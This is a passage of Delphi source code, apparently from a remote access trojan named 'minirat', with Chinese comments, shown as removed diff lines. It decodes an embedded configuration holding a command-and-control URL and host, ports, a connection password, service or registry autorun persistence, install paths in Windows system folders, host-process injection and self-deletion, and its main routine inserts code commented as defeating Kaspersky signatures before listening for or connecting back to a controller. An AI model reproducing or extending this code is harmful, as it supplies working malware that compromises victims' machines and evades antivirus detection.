- ReadFileStr(ConFile, FileContent);
- I := Length(FileContent);
- Settings := '';
- while (I > 0) and (FileContent[i] <> #00) do
- begin
- Settings := FileContent[i] + Settings;
- Dec(I);
- end;
- if (Settings = '') then
- begin
- DeleteFile(pChar(NewFileName));
- Uninstall;
- end;
- Settings := EncryptText(Settings);
- pz^.Urlhttp := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //x
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dConType := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); ////连接类型; 0:主动连接,1:被动连接
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dDnsHost := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //100
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dLocalPort := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //被动连接端口
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dRemotePort := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //主动连接端口
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dPass := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //连接客码
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dGroup := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //上线组
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dRunAsSrv := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //以服务运行 1:以服务运行,2:注册自动启动
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dInsPath := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //安装路 0:<window> 1:<system> 2<templete>
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dInsFileName := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //安装文件名称
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dIsAutoDelMe := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //是否自己删除自己 0:不删除 1:删除自己
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dSrvView := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //服务说明
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dSrvName := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //服务名称
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dSrvText := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //服务描述
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dMainThread := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //Start.exe线程ID
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- strcopy(pz^.dhostProcess,PChar(Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))))); //缩主进程名
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- strcopy(pz^.dDllFile,PChar(Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))))); //缩主进程名
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dRegLM := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //注册在HKEY_LOCAL_MACHINE
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dRegCU := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //注册在HKEY_CURRENT_USER
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- pz^.dRegSH := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //注册为Shell Explorer
- Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
- // DeleteFile(pChar(NewFileName));
- end;
- //获取系统目录 --------------------
- function GetDirectory(dInt: Integer): string;
- var
- S: array[0..255] of Char;
- begin
- case dInt of
- 0: GetWindowsDirectory(@S, 256);
- 1: GetSystemDirectory(@S, 256);
- end;
- Result := string(S) + '';
- end;
- procedure miniratMain;stdcall;
- begin
- asm //改成卡吧不能特征码
- nop
- nop
- end;
- Serv := TServer.Create;
- while not (InternetGetConnectedState(nil, 0)) do
- Sleep(5000);
- if PieZhi.dConType='0' then //0:被动连接 1:主动连接
- begin
- Serv.Port := StrToInt(PieZhi.dLocalPort);
- Serv.Listen;
- end
- else
- Serv.Connect;
- end;
- end.